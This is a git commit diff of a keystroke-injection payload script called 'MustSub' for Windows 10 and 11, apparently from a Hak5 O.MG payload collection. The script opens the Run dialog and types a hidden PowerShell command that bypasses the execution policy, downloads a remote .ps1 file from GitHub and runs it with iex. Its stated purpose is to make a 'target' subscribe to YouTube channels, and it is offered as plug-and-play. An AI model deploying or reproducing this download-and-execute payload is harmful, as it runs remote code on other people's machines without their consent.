Update MustSub-Execute.txt
This commit is contained in:
parent
ceacd5bc66
commit
3846156fd3
1 changed files with 1 additions and 6 deletions
|
@ -1,16 +1,11 @@
|
||||||
REM Title: MustSub
|
REM Title: MustSub
|
||||||
|
|
||||||
REM Author: I am Jakoby
|
REM Author: I am Jakoby
|
||||||
|
|
||||||
REM Description: This payload is used to get your target to subscribe to 15 of my favorite hacker youtube channels
|
REM Description: This payload is used to get your target to subscribe to 15 of my favorite hacker youtube channels
|
||||||
|
|
||||||
REM Target: Windows 10, 11
|
REM Target: Windows 10, 11
|
||||||
|
|
||||||
REM --------------------------------------------------------------------------------------
|
REM --------------------------------------------------------------------------------------
|
||||||
REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
|
REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
|
||||||
REM --------------------------------------------------------------------------------------
|
REM --------------------------------------------------------------------------------------
|
||||||
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-MustSub/MustSub.ps1?dl=1; invoke-expression $pl
|
STRING powershell -w h -NoP -NonI -Ep Bypass iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-MustSub/MustSub.ps1?dl=1 | iex
|
||||||
ENTER
|
ENTER
|
||||||
|
|
Loading…
Reference in a new issue